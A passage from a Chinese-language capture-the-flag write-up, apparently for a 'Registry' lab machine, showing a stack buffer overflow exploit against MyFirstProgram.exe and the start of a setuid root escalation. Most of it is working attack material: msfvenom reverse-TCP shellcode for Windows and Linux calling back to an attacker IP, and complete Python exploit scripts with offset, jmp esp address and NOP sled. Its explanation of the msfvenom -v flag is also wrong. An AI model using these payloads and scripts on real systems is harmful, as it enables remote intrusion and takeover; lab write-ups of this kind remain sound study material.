\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag<\/code><\/pre>\n<p>\u6211\u4f7f\u7528\u7684\u662f <code>ollydbg<\/code>\uff0c\u8f93\u51fa\u6d4b\u8bd5\u5b57\u7b26\u770b\u4e00\u4e0b\u504f\u79fb\u91cf\uff1a(\u6211\u8fd9\u4e2a\u673a\u5b50\u65e0\u6cd5\u8fdb\u884c\u8f93\u5165\uff0c\u53ef\u80fd\u9700\u8981\u6362\u73af\u5883\uff0c\u6211\u5c31\u5148\u7528\u73b0\u6210\u7684\u4e86)\uff0c\u6309\u7167\u5e08\u5085\u7684\u6700\u540eEIP\u4e3a<code>39654138<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ msf-pattern_offset -q 39654138\n[*] Exact match at offset 146<\/code><\/pre>\n<h4>\u67e5\u627e jmp \u5730\u5740<\/h4>\n<pre><code class=\"language-bash\">hgbe02@pwn:\/mnt\/c\/Users\/Administrator\/Desktop$ ropper --file MyFirstProgram.exe --search &quot;jmp esp;&quot;\n[INFO] Load gadgets for section: .text\n[LOAD] loading... 100%\n[LOAD] removing double gadgets... 100%\n[INFO] Searching for gadgets: jmp esp;\n\n[INFO] File: MyFirstProgram.exe\n0x080414c3: jmp esp;\n# 0x080414c3 -&gt; \\x08\\x04\\x14\\xc3 <\/code><\/pre>\n<h4>\u751f\u6210shellcode<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ msfvenom -p windows\/shell_reverse_tcp LHOST=192.168.0.143 LPORT=3456 EXITFUNC=thread -b &quot;\\x00\\x0a&quot; -a x86 -f python -v shellcode\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\nFound 11 compatible encoders\nAttempting to encode payload with 1 iterations of x86\/shikata_ga_nai\nx86\/shikata_ga_nai succeeded with size 351 (iteration=0)\nx86\/shikata_ga_nai chosen with final size 351\nPayload size: 351 bytes\nFinal size of python file: 1965 bytes\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\xbe\\xca\\x1a\\x7b\\x95\\xdb\\xcf\\xd9\\x74\\x24\\xf4&quot;\nshellcode += b&quot;\\x58\\x31\\xc9\\xb1\\x52\\x83\\xc0\\x04\\x31\\x70\\x0e&quot;\nshellcode += b&quot;\\x03\\xba\\x14\\x99\\x60\\xc6\\xc1\\xdf\\x8b\\x36\\x12&quot;\nshellcode += b&quot;\\x80\\x02\\xd3\\x23\\x80\\x71\\x90\\x14\\x30\\xf1\\xf4&quot;\nshellcode += b&quot;\\x98\\xbb\\x57\\xec\\x2b\\xc9\\x7f\\x03\\x9b\\x64\\xa6&quot;\nshellcode += b&quot;\\x2a\\x1c\\xd4\\x9a\\x2d\\x9e\\x27\\xcf\\x8d\\x9f\\xe7&quot;\nshellcode += b&quot;\\x02\\xcc\\xd8\\x1a\\xee\\x9c\\xb1\\x51\\x5d\\x30\\xb5&quot;\nshellcode += b&quot;\\x2c\\x5e\\xbb\\x85\\xa1\\xe6\\x58\\x5d\\xc3\\xc7\\xcf&quot;\nshellcode += b&quot;\\xd5\\x9a\\xc7\\xee\\x3a\\x97\\x41\\xe8\\x5f\\x92\\x18&quot;\nshellcode += b&quot;\\x83\\x94\\x68\\x9b\\x45\\xe5\\x91\\x30\\xa8\\xc9\\x63&quot;\nshellcode += b&quot;\\x48\\xed\\xee\\x9b\\x3f\\x07\\x0d\\x21\\x38\\xdc\\x6f&quot;\nshellcode += b&quot;\\xfd\\xcd\\xc6\\xc8\\x76\\x75\\x22\\xe8\\x5b\\xe0\\xa1&quot;\nshellcode += b&quot;\\xe6\\x10\\x66\\xed\\xea\\xa7\\xab\\x86\\x17\\x23\\x4a&quot;\nshellcode += b&quot;\\x48\\x9e\\x77\\x69\\x4c\\xfa\\x2c\\x10\\xd5\\xa6\\x83&quot;\nshellcode += b&quot;\\x2d\\x05\\x09\\x7b\\x88\\x4e\\xa4\\x68\\xa1\\x0d\\xa1&quot;\nshellcode += b&quot;\\x5d\\x88\\xad\\x31\\xca\\x9b\\xde\\x03\\x55\\x30\\x48&quot;\nshellcode += b&quot;\\x28\\x1e\\x9e\\x8f\\x4f\\x35\\x66\\x1f\\xae\\xb6\\x97&quot;\nshellcode += b&quot;\\x36\\x75\\xe2\\xc7\\x20\\x5c\\x8b\\x83\\xb0\\x61\\x5e&quot;\nshellcode += b&quot;\\x03\\xe0\\xcd\\x31\\xe4\\x50\\xae\\xe1\\x8c\\xba\\x21&quot;\nshellcode += b&quot;\\xdd\\xad\\xc5\\xeb\\x76\\x47\\x3c\\x7c\\xb9\\x30\\x3e&quot;\nshellcode += b&quot;\\xf3\\x51\\x43\\x3e\\x06\\x22\\xca\\xd8\\x72\\x32\\x9b&quot;\nshellcode += b&quot;\\x73\\xeb\\xab\\x86\\x0f\\x8a\\x34\\x1d\\x6a\\x8c\\xbf&quot;\nshellcode += b&quot;\\x92\\x8b\\x43\\x48\\xde\\x9f\\x34\\xb8\\x95\\xfd\\x93&quot;\nshellcode += b&quot;\\xc7\\x03\\x69\\x7f\\x55\\xc8\\x69\\xf6\\x46\\x47\\x3e&quot;\nshellcode += b&quot;\\x5f\\xb8\\x9e\\xaa\\x4d\\xe3\\x08\\xc8\\x8f\\x75\\x72&quot;\nshellcode += b&quot;\\x48\\x54\\x46\\x7d\\x51\\x19\\xf2\\x59\\x41\\xe7\\xfb&quot;\nshellcode += b&quot;\\xe5\\x35\\xb7\\xad\\xb3\\xe3\\x71\\x04\\x72\\x5d\\x28&quot;\nshellcode += b&quot;\\xfb\\xdc\\x09\\xad\\x37\\xdf\\x4f\\xb2\\x1d\\xa9\\xaf&quot;\nshellcode += b&quot;\\x03\\xc8\\xec\\xd0\\xac\\x9c\\xf8\\xa9\\xd0\\x3c\\x06&quot;\nshellcode += b&quot;\\x60\\x51\\x5c\\xe5\\xa0\\xac\\xf5\\xb0\\x21\\x0d\\x98&quot;\nshellcode += b&quot;\\x42\\x9c\\x52\\xa5\\xc0\\x14\\x2b\\x52\\xd8\\x5d\\x2e&quot;\nshellcode += b&quot;\\x1e\\x5e\\x8e\\x42\\x0f\\x0b\\xb0\\xf1\\x30\\x1e&quot;<\/code><\/pre>\n<ul>\n<li><code>-p windows\/shell_reverse_tcp<\/code>: \u6307\u5b9a\u4e86\u8981\u751f\u6210\u7684 payload \u7c7b\u578b\u3002\u8fd9\u91cc\uff0c<code>windows\/shell_reverse_tcp<\/code> \u8868\u793a\u8fd9\u662f\u4e00\u4e2a\u9488\u5bf9 Windows \u7cfb\u7edf\u7684\u53cd\u5411 TCP shell payload\u3002\u8fd9\u610f\u5473\u7740\u5f53\u76ee\u6807\u7cfb\u7edf\u6267\u884c\u8fd9\u6bb5 shellcode \u65f6\uff0c\u5b83\u4f1a\u5c1d\u8bd5\u56de\u8fde\u5230\u6307\u5b9a\u7684 IP \u5730\u5740\u548c\u7aef\u53e3\uff0c\u4ece\u800c\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7\u53cd\u5411\u8fde\u63a5\u83b7\u5f97\u4e00\u4e2a\u547d\u4ee4\u884c shell\u3002<\/li>\n<li>`LHOST: \u8bbe\u7f6e payload \u4e2d\u7684\u672c\u5730\u4e3b\u673a\uff08Listener Host\uff09IP \u5730\u5740\uff0c\u5373 shellcode \u5c06\u4f1a\u56de\u8fde\u5230\u7684 IP \u5730\u5740\u3002<\/li>\n<li><code>LPORT<\/code>: \u8bbe\u7f6e payload \u4e2d\u7684\u672c\u5730\u7aef\u53e3\uff08Listener Port\uff09\uff0c\u5373 shellcode \u5c06\u4f1a\u56de\u8fde\u5230\u7684\u7aef\u53e3\u3002<\/li>\n<li><code>EXITFUNC=thread<\/code>: \u6307\u5b9a payload \u6267\u884c\u5b8c\u6210\u540e\u7684\u9000\u51fa\u51fd\u6570\u3002<code>thread<\/code> \u8868\u793a payload \u5c06\u5728\u72ec\u7acb\u7684\u7ebf\u7a0b\u4e2d\u8fd0\u884c\uff0c\u5e76\u5728\u5b8c\u6210\u5176\u4efb\u52a1\u540e\u5e72\u51c0\u5730\u9000\u51fa\u3002\u8fd9\u6709\u52a9\u4e8e\u4fdd\u6301\u7cfb\u7edf\u7684\u7a33\u5b9a\u6027\uff0c\u7279\u522b\u662f\u5728\u9700\u8981\u957f\u65f6\u95f4\u8fd0\u884c\u6216\u590d\u6742\u4ea4\u4e92\u7684\u573a\u666f\u4e2d\u3002<\/li>\n<li><code>-b &quot;\\x00\\0a&quot;<\/code>: \u6307\u5b9a\u5728\u751f\u6210\u7684 shellcode \u4e2d\u9700\u8981\u907f\u514d\uff08\u5373\u201c\u574f\u5b57\u7b26\u201d\uff09\u7684\u5b57\u8282\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c\u662f <code>\\x00<\/code>\uff08\u7a7a\u5b57\u8282\uff09\uff0c\u5b83\u7ecf\u5e38\u5728\u67d0\u4e9b\u73af\u5883\u4e2d\u88ab\u7528\u4f5c\u5b57\u7b26\u4e32\u7684\u7ec8\u7ed3\u7b26\uff0c\u56e0\u6b64\u907f\u514d\u5728 shellcode \u4e2d\u51fa\u73b0\u662f\u5f88\u91cd\u8981\u7684\u3002<\/li>\n<li><code>-a x86<\/code>: \u6307\u5b9a\u76ee\u6807\u67b6\u6784\u3002<code>x86<\/code> \u8868\u793a\u8fd9\u4e2a payload \u662f\u4e3a 32 \u4f4d\uff08x86\uff09\u7cfb\u7edf\u8bbe\u8ba1\u7684\u3002\u5982\u679c\u4f60\u7684\u76ee\u6807\u7cfb\u7edf\u662f 64 \u4f4d\u7684\uff0c\u4f60\u53ef\u80fd\u9700\u8981\u9009\u62e9 <code>x64<\/code>\u3002<\/li>\n<li><code>-f python<\/code>: \u6307\u5b9a\u8f93\u51fa\u7684\u683c\u5f0f\u3002\u5728\u8fd9\u4e2a\u4f8b\u5b50\u4e2d\uff0c<code>python<\/code> \u8868\u793a\u751f\u6210\u7684 shellcode \u5c06\u88ab\u7f16\u7801\u4e3a Python \u811a\u672c\u7684\u4e00\u90e8\u5206\uff0c\u8fd9\u901a\u5e38\u7528\u4e8e\u5c06 shellcode \u5d4c\u5165\u5230 Python \u7a0b\u5e8f\u4e2d\uff0c\u4ee5\u4fbf\u5728\u76ee\u6807\u7cfb\u7edf\u4e0a\u6267\u884c\u3002<\/li>\n<li><code>-v shellcode<\/code>: \u8fd9\u91cc\u7684 <code>-v<\/code> \u5b9e\u9645\u4e0a\u662f\u4e00\u4e2a\u5e38\u89c1\u7684\u8bef\u89e3\u3002\u5728 <code>msfvenom<\/code> \u547d\u4ee4\u4e2d\uff0c<code>-v<\/code> \u901a\u5e38\u7528\u4e8e\u589e\u52a0\u8f93\u51fa\u7684\u8be6\u7ec6\u7a0b\u5ea6\uff08verbose \u6a21\u5f0f\uff09\uff0c\u4f46\u540e\u9762\u7d27\u8ddf\u7684 <code>shellcode<\/code> \u5e76\u4e0d\u662f\u4e00\u4e2a\u6807\u51c6\u7684 <code>msfvenom<\/code> \u53c2\u6570\u3002\u5982\u679c\u4f60\u7684\u610f\u56fe\u662f\u7b80\u5355\u5730\u67e5\u770b\u6216\u6307\u5b9a\u8f93\u51fa\u5185\u5bb9\u7684\u540d\u79f0\uff0c\u4f60\u53ef\u80fd\u9700\u8981\u53bb\u6389 <code>-v<\/code> \u5e76\u76f4\u63a5\u5728\u547d\u4ee4\u672b\u5c3e\u6307\u5b9a\u8f93\u51fa\u6587\u4ef6\u7684\u540d\u79f0\uff08\u4f8b\u5982 <code>-o shellcode.py<\/code>\uff09\u3002\u4e0d\u8fc7\uff0c\u5982\u679c\u4f60\u7684 <code>msfvenom<\/code> \u7248\u672c\u6216\u4e0a\u4e0b\u6587\u5141\u8bb8\u8fd9\u6837\u7684\u7528\u6cd5\uff08\u5c3d\u7ba1\u4e0d\u5e38\u89c1\uff09\uff0c\u5b83\u53ef\u80fd\u662f\u4e00\u4e2a\u7279\u5b9a\u73af\u5883\u6216\u7248\u672c\u7684\u7279\u6027\u3002<\/li>\n<\/ul>\n<h4>\u7f16\u5199\u7a0b\u5e8f<\/h4>\n<p>\u5c1d\u8bd5\u7f16\u5199\u7834\u89e3\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\n\nfrom pwn import *\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnect = s.connect((&quot;192.168.0.115&quot;, 42424))\n\noffset = 146\njunk = b&#039;A&#039; * offset\njmp_addr = b&quot;\\xc3\\x14\\x04\\x08&quot;\nnops = b&quot;\\x90&quot; * 100\n\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\xbe\\xca\\x1a\\x7b\\x95\\xdb\\xcf\\xd9\\x74\\x24\\xf4&quot;\nshellcode += b&quot;\\x58\\x31\\xc9\\xb1\\x52\\x83\\xc0\\x04\\x31\\x70\\x0e&quot;\nshellcode += b&quot;\\x03\\xba\\x14\\x99\\x60\\xc6\\xc1\\xdf\\x8b\\x36\\x12&quot;\nshellcode += b&quot;\\x80\\x02\\xd3\\x23\\x80\\x71\\x90\\x14\\x30\\xf1\\xf4&quot;\nshellcode += b&quot;\\x98\\xbb\\x57\\xec\\x2b\\xc9\\x7f\\x03\\x9b\\x64\\xa6&quot;\nshellcode += b&quot;\\x2a\\x1c\\xd4\\x9a\\x2d\\x9e\\x27\\xcf\\x8d\\x9f\\xe7&quot;\nshellcode += b&quot;\\x02\\xcc\\xd8\\x1a\\xee\\x9c\\xb1\\x51\\x5d\\x30\\xb5&quot;\nshellcode += b&quot;\\x2c\\x5e\\xbb\\x85\\xa1\\xe6\\x58\\x5d\\xc3\\xc7\\xcf&quot;\nshellcode += b&quot;\\xd5\\x9a\\xc7\\xee\\x3a\\x97\\x41\\xe8\\x5f\\x92\\x18&quot;\nshellcode += b&quot;\\x83\\x94\\x68\\x9b\\x45\\xe5\\x91\\x30\\xa8\\xc9\\x63&quot;\nshellcode += b&quot;\\x48\\xed\\xee\\x9b\\x3f\\x07\\x0d\\x21\\x38\\xdc\\x6f&quot;\nshellcode += b&quot;\\xfd\\xcd\\xc6\\xc8\\x76\\x75\\x22\\xe8\\x5b\\xe0\\xa1&quot;\nshellcode += b&quot;\\xe6\\x10\\x66\\xed\\xea\\xa7\\xab\\x86\\x17\\x23\\x4a&quot;\nshellcode += b&quot;\\x48\\x9e\\x77\\x69\\x4c\\xfa\\x2c\\x10\\xd5\\xa6\\x83&quot;\nshellcode += b&quot;\\x2d\\x05\\x09\\x7b\\x88\\x4e\\xa4\\x68\\xa1\\x0d\\xa1&quot;\nshellcode += b&quot;\\x5d\\x88\\xad\\x31\\xca\\x9b\\xde\\x03\\x55\\x30\\x48&quot;\nshellcode += b&quot;\\x28\\x1e\\x9e\\x8f\\x4f\\x35\\x66\\x1f\\xae\\xb6\\x97&quot;\nshellcode += b&quot;\\x36\\x75\\xe2\\xc7\\x20\\x5c\\x8b\\x83\\xb0\\x61\\x5e&quot;\nshellcode += b&quot;\\x03\\xe0\\xcd\\x31\\xe4\\x50\\xae\\xe1\\x8c\\xba\\x21&quot;\nshellcode += b&quot;\\xdd\\xad\\xc5\\xeb\\x76\\x47\\x3c\\x7c\\xb9\\x30\\x3e&quot;\nshellcode += b&quot;\\xf3\\x51\\x43\\x3e\\x06\\x22\\xca\\xd8\\x72\\x32\\x9b&quot;\nshellcode += b&quot;\\x73\\xeb\\xab\\x86\\x0f\\x8a\\x34\\x1d\\x6a\\x8c\\xbf&quot;\nshellcode += b&quot;\\x92\\x8b\\x43\\x48\\xde\\x9f\\x34\\xb8\\x95\\xfd\\x93&quot;\nshellcode += b&quot;\\xc7\\x03\\x69\\x7f\\x55\\xc8\\x69\\xf6\\x46\\x47\\x3e&quot;\nshellcode += b&quot;\\x5f\\xb8\\x9e\\xaa\\x4d\\xe3\\x08\\xc8\\x8f\\x75\\x72&quot;\nshellcode += b&quot;\\x48\\x54\\x46\\x7d\\x51\\x19\\xf2\\x59\\x41\\xe7\\xfb&quot;\nshellcode += b&quot;\\xe5\\x35\\xb7\\xad\\xb3\\xe3\\x71\\x04\\x72\\x5d\\x28&quot;\nshellcode += b&quot;\\xfb\\xdc\\x09\\xad\\x37\\xdf\\x4f\\xb2\\x1d\\xa9\\xaf&quot;\nshellcode += b&quot;\\x03\\xc8\\xec\\xd0\\xac\\x9c\\xf8\\xa9\\xd0\\x3c\\x06&quot;\nshellcode += b&quot;\\x60\\x51\\x5c\\xe5\\xa0\\xac\\xf5\\xb0\\x21\\x0d\\x98&quot;\nshellcode += b&quot;\\x42\\x9c\\x52\\xa5\\xc0\\x14\\x2b\\x52\\xd8\\x5d\\x2e&quot;\nshellcode += b&quot;\\x1e\\x5e\\x8e\\x42\\x0f\\x0b\\xb0\\xf1\\x30\\x1e&quot;\n\npayload = junk + jmp_addr + nops + shellcode + b&quot;\\n\\r&quot;   # CRLF\n\ns.send(payload)\ndata = s.recv(1024)\ns.close()<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158502.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158502.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705220912194\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158503.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158503.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705220926415\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u867d\u7136\u5f97\u5230\u4e86cmd\u7684\u7ec8\u7aef\uff0c\u4f46\u662f\u6211\u4eec\u662flinux\u7684\u4e3b\u673a\uff0c\u6240\u4ee5\u4e0a\u9762\u7684\u64cd\u4f5c\u8981\u7a0d\u5fae\u6539\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ msfvenom -p linux\/x86\/shell_reverse_tcp LHOST=192.168.0.143 LPORT=1234 EXITFUNC=thread -b &quot;\\x00\\x0a&quot; -f python\n[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nFound 11 compatible encoders\nAttempting to encode payload with 1 iterations of x86\/shikata_ga_nai\nx86\/shikata_ga_nai succeeded with size 95 (iteration=0)\nx86\/shikata_ga_nai chosen with final size 95\nPayload size: 95 bytes\nFinal size of python file: 479 bytes\nbuf =  b&quot;&quot;\nbuf += b&quot;\\xd9\\xc9\\xd9\\x74\\x24\\xf4\\xb8\\xa8\\xb2\\x01\\xac\\x5a&quot;\nbuf += b&quot;\\x33\\xc9\\xb1\\x12\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\xea&quot;\nbuf += b&quot;\\xa1\\xe3\\x59\\xdb\\x1e\\x14\\x42\\x48\\xe2\\x88\\xef\\x6c&quot;\nbuf += b&quot;\\x6d\\xcf\\x40\\x16\\xa0\\x90\\x32\\x8f\\x8a\\xae\\xf9\\xaf&quot;\nbuf += b&quot;\\xa2\\xa9\\xf8\\xc7\\xf4\\xe2\\xfb\\x98\\x9d\\xf0\\xfb\\xa2&quot;\nbuf += b&quot;\\x8f\\x7c\\x1a\\x1a\\x49\\x2f\\x8c\\x09\\x25\\xcc\\xa7\\x4c&quot;\nbuf += b&quot;\\x84\\x53\\xe5\\xe6\\x79\\x7b\\x79\\x9e\\xed\\xac\\x52\\x3c&quot;\nbuf += b&quot;\\x87\\x3b\\x4f\\x92\\x04\\xb5\\x71\\xa2\\xa0\\x08\\xf1&quot;<\/code><\/pre>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\n\nfrom pwn import *\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnect = s.connect((&quot;192.168.0.115&quot;, 42424))\n\noffset = 146\njunk = b&#039;A&#039; * offset\njmp_addr = b&quot;\\xc3\\x14\\x04\\x08&quot;\nnops = b&quot;\\x90&quot; * 100\n\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\xd9\\xc9\\xd9\\x74\\x24\\xf4\\xb8\\xa8\\xb2\\x01\\xac\\x5a&quot;\nshellcode += b&quot;\\x33\\xc9\\xb1\\x12\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\xea&quot;\nshellcode += b&quot;\\xa1\\xe3\\x59\\xdb\\x1e\\x14\\x42\\x48\\xe2\\x88\\xef\\x6c&quot;\nshellcode += b&quot;\\x6d\\xcf\\x40\\x16\\xa0\\x90\\x32\\x8f\\x8a\\xae\\xf9\\xaf&quot;\nshellcode += b&quot;\\xa2\\xa9\\xf8\\xc7\\xf4\\xe2\\xfb\\x98\\x9d\\xf0\\xfb\\xa2&quot;\nshellcode += b&quot;\\x8f\\x7c\\x1a\\x1a\\x49\\x2f\\x8c\\x09\\x25\\xcc\\xa7\\x4c&quot;\nshellcode += b&quot;\\x84\\x53\\xe5\\xe6\\x79\\x7b\\x79\\x9e\\xed\\xac\\x52\\x3c&quot;\nshellcode += b&quot;\\x87\\x3b\\x4f\\x92\\x04\\xb5\\x71\\xa2\\xa0\\x08\\xf1&quot;\n\npayload = junk + jmp_addr + nops + shellcode + b&quot;\\n\\r&quot;   # CRLF\n\ns.send(payload)\ndata = s.recv(1024)\ns.close()<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158504.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158504.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705222732254\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158505.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158505.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705222741196\" \/><\/div><\/p>\n<h4>\u63d0\u6743root<\/h4>\n<pre><code class=\"language-bash\">(remote) gato@registry:\/home\/gato\/.ssh$ find \/ -user gato 2&gt;\/dev\/null | grep -v proc\n......\n\/home\/gato\/.php_history\n\/var\/crash\/_opt_others_program.1000.crash\n\/opt\n\/opt\/projects\n\/opt\/projects\/MyFirstProgram.exe\n\/opt\/fixed\n(remote) gato@registry:\/home\/gato\/.ssh$ ls -la \/opt\/fixed\ntotal 24\ndrwx------ 2 gato gato  4096 Jul 24  2023 .\ndr-xr-xr-x 5 gato gato  4096 Jul 24  2023 ..\n-rwsr-xr-x 1 root root 14940 Jul 24  2023 new\n(remote) gato@registry:\/home\/gato\/.ssh$ file \/opt\/fixed\/new\n\/opt\/fixed\/new: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, BuildID[sha1]=869b300da96175f44db43fb5a34c9f56d012163d, for GNU\/Linux 3.2.0, not stripped\n\n(remote) gato@registry:\/opt\/fixed$ .\/new a\n(remote) gato@registry:\/opt\/fixed$ checksec new\n[*] Checking for new versions of pwntools\n    To disable this functionality, set the contents of \/home\/gato\/.cache\/.pwntools-cache-2.7\/update to &#039;never&#039; (old way).\n    Or add the following lines to ~\/.pwn.conf or ~\/.config\/pwn.conf (or \/etc\/pwn.conf system-wide):\n        [update]\n        interval=never\n[*] A newer version of pwntools is available on pypi (4.10.0 --&gt; 4.12.0).\n    Update with: $ pip install -U pwntools\n[!] Could not populate PLT: invalid syntax (unicorn.py, line 110)\n[*] &#039;\/opt\/fixed\/new&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)<\/code><\/pre>\n<p>\u8fdb\u884c\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) gato@registry:\/opt\/fixed$ gdb .\/new\nGNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1\nCopyright (C) 2022 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType &quot;show copying&quot; and &quot;show warranty&quot; for details.\nThis GDB was configured as &quot;x86_64-linux-gnu&quot;.\nType &quot;show configuration&quot; for configuration details.\nFor bug reporting instructions, please see:\n&lt;https:\/\/www.gnu.org\/software\/gdb\/bugs\/&gt;.\nFind the GDB manual and other documentation resources online at:\n    &lt;http:\/\/www.gnu.org\/software\/gdb\/documentation\/&gt;.\n\nFor help, type &quot;help&quot;.\nType &quot;apropos word&quot; to search for commands related to &quot;word&quot;...\nReading symbols from .\/new...\n(No debugging symbols found in .\/new)\n......\n\u4e2d\u95f4\u6709\u5565\u62a5\u9519\u6309\u7167\u63a8\u8350\u8d70\u7684\n......\ngdb-peda$ run $(pattern_create 200)\n\nFatal signal: Segmentation fault<\/code><\/pre>\n<p>\u5b58\u5728\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u627e\u4e00\u4e0b\u504f\u79fb\u91cf\uff1a<\/p>\n<pre><code class=\"language-bash\">gdb-peda$ pattern_arg 200<\/code><\/pre>\n<pre><code class=\"language-bash\">[----------------------------------registers-----------------------------------]\nEAX: 0xffc83700 (&quot;AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\nEBX: 0x6c414150 (&#039;PAAl&#039;)\nECX: 0xffc83e20 (&quot;AAwAAZAAxAAyA&quot;)\nEDX: 0xffc837bb (&quot;AAwAAZAAxAAyA&quot;)\nESI: 0xffc837d0 --&gt; 0x2 \nEDI: 0xf7f50b80 